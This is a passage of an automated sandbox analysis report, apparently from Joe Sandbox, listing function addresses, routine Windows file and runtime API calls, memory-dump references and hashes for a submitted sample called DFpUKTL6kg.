                    • Part of subcall function 009FC827: __EH_prolog.LIBCMT ref: 009FC82C
                    • Part of subcall function 009FC827: new.LIBCMT ref: 009FC86F
                    • Part of subcall function 009FC827: new.LIBCMT ref: 009FC893
                  • new.LIBCMT ref: 009F13FE
                    • Part of subcall function 009FB07D: __EH_prolog.LIBCMT ref: 009FB082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: cd27f02053ace54d717ce364237b0c20ef1e0c968fe4a16132b10f8bcd0dd26e
                  • Instruction ID: 52badc9299c8bf9ff65b018fed0c26ddd524d93ff1a0ec7d26e8ae419b185db8
                  • Opcode Fuzzy Hash: cd27f02053ace54d717ce364237b0c20ef1e0c968fe4a16132b10f8bcd0dd26e
                  • Instruction Fuzzy Hash: 654135B0805B44DEE728DF798485AE7FBE5FB18310F504A2ED2EE93282CB326554CB51
                  Function 009F1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F1385
                    • Part of subcall function 009F6057: __EH_prolog.LIBCMT ref: 009F605C
                    • Part of subcall function 009FC827: __EH_prolog.LIBCMT ref: 009FC82C
                    • Part of subcall function 009FC827: new.LIBCMT ref: 009FC86F
                    • Part of subcall function 009FC827: new.LIBCMT ref: 009FC893
                  • new.LIBCMT ref: 009F13FE
                    • Part of subcall function 009FB07D: __EH_prolog.LIBCMT ref: 009FB082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 1eb358f7bc2af319b42ff27763e6249dbb9ec2932437c3979814d06eedcead9e
                  • Instruction ID: 01ce6ddba2521078bb65aef3ed61c93a9bf43c8939f39947d3da6a44043c5489
                  • Opcode Fuzzy Hash: 1eb358f7bc2af319b42ff27763e6249dbb9ec2932437c3979814d06eedcead9e
                  • Instruction Fuzzy Hash: 144132B0805B44DEE728DF798485AE7FAE5FB18310F504A2ED2EE93282CB326554CB51
                  Function 00A1B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A18FA5: GetLastError.KERNEL32(?,00A30EE8,00A13E14,00A30EE8,?,?,00A13713,00000050,?,00A30EE8,00000200), ref: 00A18FA9
                    • Part of subcall function 00A18FA5: _free.LIBCMT ref: 00A18FDC
                    • Part of subcall function 00A18FA5: SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A1901D
                    • Part of subcall function 00A18FA5: _abort.LIBCMT ref: 00A19023
                    • Part of subcall function 00A1B2AE: _abort.LIBCMT ref: 00A1B2E0
                    • Part of subcall function 00A1B2AE: _free.LIBCMT ref: 00A1B314
                    • Part of subcall function 00A1AF1B: GetOEMCP.KERNEL32(00000000,?,?,00A1B1A5,?), ref: 00A1AF46
                  • _free.LIBCMT ref: 00A1B200
                  • _free.LIBCMT ref: 00A1B236
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID:
                  • API String ID: 2991157371-0
                  • Opcode ID: 75b8a3414821584c4b62e01cbf01b1b24f93f3da29089db8c9033e1ddf60d320
                  • Instruction ID: 4e94496299a3fffc9561efa81dfc525d243e615a9eb9279167ad459134049932
                  • Opcode Fuzzy Hash: 75b8a3414821584c4b62e01cbf01b1b24f93f3da29089db8c9033e1ddf60d320
                  • Instruction Fuzzy Hash: 09310831900208AFDB10EFA9D941BEDB7F1EF45320F254199F8149B2A1EB755DC6CB60
                  Function 009F971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,009F9EDC,?,?,009F7867), ref: 009F97A6
                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,009F9EDC,?,?,009F7867), ref: 009F97DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 055725760ed1629209be54abfd7251c536946d6288aba555cfd7defd70290a55
                  • Instruction ID: b4ded94742205215f48c51f8d7fac4bbd3a95338721e7ae072eef44c8d351fd2
                  • Opcode Fuzzy Hash: 055725760ed1629209be54abfd7251c536946d6288aba555cfd7defd70290a55
                  • Instruction Fuzzy Hash: 8821E4B111474CAEE730AF68C885BB777ECEB49764F10892DF6E582191C374AC498B61
                  Function 009F9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                  Download Yara Rule
                  APIs
                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,009F7547,?,?,?,?), ref: 009F9D7C
                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 009F9E2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$BuffersFlushTime
                  • String ID:
                  • API String ID: 1392018926-0
                  • Opcode ID: 456af0960a0255b062853efc947a078cec7ceb401ad423adb5b26958355e7235
                  • Instruction ID: b7da9d6dca598f12a7ae6fea822df310520bc2196015e0e782e8965629fd7d4a
                  • Opcode Fuzzy Hash: 456af0960a0255b062853efc947a078cec7ceb401ad423adb5b26958355e7235
                  • Instruction Fuzzy Hash: C621D63114824AABC714DE24C451FBBBBE8AF56704F14081DB9C187191D329DA0DDB61
                  Function 00A1A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00A1A4B8
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A1A4C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: c73fba21550afef3b8c2587da9e8d0d6f343f56cee529f72d5f44aa6906325c4
                  • Instruction ID: 04c10e8491f9cb07111bdc5c52cb2991e4be19ef914df758708856de5c538be0
                  • Opcode Fuzzy Hash: c73fba21550afef3b8c2587da9e8d0d6f343f56cee529f72d5f44aa6906325c4
                  • Instruction Fuzzy Hash: E6110A336021305B9F32DF6CEC448EA73A59BA43607164120FD15AB244DA74DCC2C6D2
                  Function 009F9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                  Download Yara Rule
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,009F9B35,?,?,00000000,?,?,009F8D9C,?), ref: 009F9BC0
                  • GetLastError.KERNEL32 ref: 009F9BCD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 25498280774cece68f465fa9284553148c3e1958a27c868eba17eaa9838403e1
                  • Instruction ID: 3428bf44d264f1476d51efd54438e1fcd3e37d34bc392f3db284d51ac0d6ed89
                  • Opcode Fuzzy Hash: 25498280774cece68f465fa9284553148c3e1958a27c868eba17eaa9838403e1
                  • Instruction Fuzzy Hash: 4501C83230421D9F8B18CE69AC94B7EB35DAFC5732B14452EFF1687290CA35D8069B21
                  Function 009F9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 009F9E76
                  • GetLastError.KERNEL32 ref: 009F9E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 9973f4dfa534d141fdafa0de8ae884d47c76bc07a3888a6fc51f78dedc98692b
                  • Instruction ID: 47ddb09fc407ba3b75d69d1ba1e61db6d0f3c99e6f7170038e52915168281c5d
                  • Opcode Fuzzy Hash: 9973f4dfa534d141fdafa0de8ae884d47c76bc07a3888a6fc51f78dedc98692b
                  • Instruction Fuzzy Hash: E0019E723043085BEB34DE69DC44B7BB6DD9B89324F14493EB246C2680DA35EC4C8710
                  Function 00A18606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00A18627
                    • Part of subcall function 00A18518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00A30F50,009FCE57,?,?,?,?,?,?), ref: 00A18663
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Heap$AllocAllocate_free
                  • String ID:
                  • API String ID: 2447670028-0
                  • Opcode ID: 57de9b6735d512b23b02dbbba4c2fa8d84c84703d05f42de85ef09f27ad84b8c
                  • Instruction ID: 4a5e36e44f12f80e9d56210727fbf43036b18d1357f1d798ea80502cc94ec1dd
                  • Opcode Fuzzy Hash: 57de9b6735d512b23b02dbbba4c2fa8d84c84703d05f42de85ef09f27ad84b8c
                  • Instruction Fuzzy Hash: 5DF09632201155A6DB312B65AD00FEF776D9FE2BB0F284215F87896191EF3CC8C155A5
                  Function 00A00908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?), ref: 00A00915
                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 00A0091C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1231390398-0
                  • Opcode ID: b61a76bfc922151c68252efd96e05a95be07c24f4657e5719b2a897a6be32d39
                  • Instruction ID: 5879d49ee831b1ad74f0b7e3b6ef64c4d061ae42eb66d41a2cab3f2fa5dc929d
                  • Opcode Fuzzy Hash: b61a76bfc922151c68252efd96e05a95be07c24f4657e5719b2a897a6be32d39
                  • Instruction Fuzzy Hash: 41E09233A1410DABEF19CBA8AC04EBB73ADEB05390B204179A807D3241F934DE0286B0
                  Function 009FA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009FA27A,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA458
                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009FA27A,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA489
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 89944ee2108969122f1ce99564c59e45e89c3c628b985151d908d1eb957bc3b6
                  • Instruction ID: 3f48576f6e3a2054d9f0e4ebc114e19546c3181561bdd2e2906678e2e2866fba
                  • Opcode Fuzzy Hash: 89944ee2108969122f1ce99564c59e45e89c3c628b985151d908d1eb957bc3b6
                  • Instruction Fuzzy Hash: 36F0A03124120D7BDF119F61DC05FE9376CBB08385F048061BD8C86161DB768AA9EB60
                  Function 00A0D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemText_swprintf
                  • String ID:
                  • API String ID: 3011073432-0
                  • Opcode ID: 72bec995c044356c589757d83ddd903c7a8f7aab469b98ec4a180601d32ed067
                  • Instruction ID: b48d3041f29510eadb4f6f58101b2699e3da91eea6a1872833889ddaabf5859c
                  • Opcode Fuzzy Hash: 72bec995c044356c589757d83ddd903c7a8f7aab469b98ec4a180601d32ed067
                  • Instruction Fuzzy Hash: DBF0EC7350034C7AEB11EBF0AC06FAE376DAB04745F040555B700670E1DA756A514762
                  Function 009FA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileW.KERNELBASE(?,?,?,009F984C,?,?,009F9688,?,?,?,?,00A21FA1,000000FF), ref: 009FA13E
                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,009F984C,?,?,009F9688,?,?,?,?,00A21FA1,000000FF), ref: 009FA16C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: cfb480c7df9291fc3888bb943f74b239b778b5e4191addbd6932793f6e2f4edc
                  • Instruction ID: 5ee4402c384f01b4559d2ea5d03aa5133337d0ac54940d1064389d67836922da
                  • Opcode Fuzzy Hash: cfb480c7df9291fc3888bb943f74b239b778b5e4191addbd6932793f6e2f4edc
                  • Instruction Fuzzy Hash: 8CE0227524420C6BDB109F60DC01FF9376CAB08381F488071BD88C7060DB218D99ABA0
                  Function 00A0A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON
                  Download Yara Rule
                  APIs
                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00A21FA1,000000FF), ref: 00A0A3D1
                  • OleUninitialize.OLE32(?,?,?,?,00A21FA1,000000FF), ref: 00A0A3D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: GdiplusShutdownUninitialize
                  • String ID:
                  • API String ID: 3856339756-0
                  • Opcode ID: 32485ef7e6c74b4bdbd70f2ea45ba00d06c96454ca2ce68a98d0f52fed262bc1
                  • Instruction ID: 7892da6e895b59238af9a5b636bc31751a05137248a10e9b6e2c8925f64b575e
                  • Opcode Fuzzy Hash: 32485ef7e6c74b4bdbd70f2ea45ba00d06c96454ca2ce68a98d0f52fed262bc1
                  • Instruction Fuzzy Hash: 24F06572518654EFC710DB9DED05B59FBACFB49B20F04476AF41983760CB786811CB91
                  Function 009FA194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,?,009FA189,?,009F76B2,?,?,?,?), ref: 009FA1A5
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,009FA189,?,009F76B2,?,?,?,?), ref: 009FA1D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: c043e01d92b3fa4bdf4599992e77982104cf2fcfed711b3fad9e40b5b760e598
                  • Instruction ID: 715349f765b46e3234ee86504d8587982e344c32fe9965bece8a750456f88393
                  • Opcode Fuzzy Hash: c043e01d92b3fa4bdf4599992e77982104cf2fcfed711b3fad9e40b5b760e598
                  • Instruction Fuzzy Hash: ACE0927660412C5BCB20EBA8DC05BF9BB6CAB093E1F0042B1FE48E7690D7709D459BE1
                  Function 00A00085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: DirectoryLibraryLoadSystem
                  • String ID:
                  • API String ID: 1175261203-0
                  • Opcode ID: 9209e0dd50a7981ddfcf67d2359ca8c163525fe376d9a51c0dea6535ab724692
                  • Instruction ID: d8ca75de223c62aa82a5e017587530d07a39e3c725a30d70117bb5dd72235eb6
                  • Opcode Fuzzy Hash: 9209e0dd50a7981ddfcf67d2359ca8c163525fe376d9a51c0dea6535ab724692
                  • Instruction Fuzzy Hash: B9E0127690511C6ADB21DBA4EC05FE6776CEF0D382F0444A5BA48D3144DA749A848BB0
                  Function 00A09B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                  Download Yara Rule
                  APIs
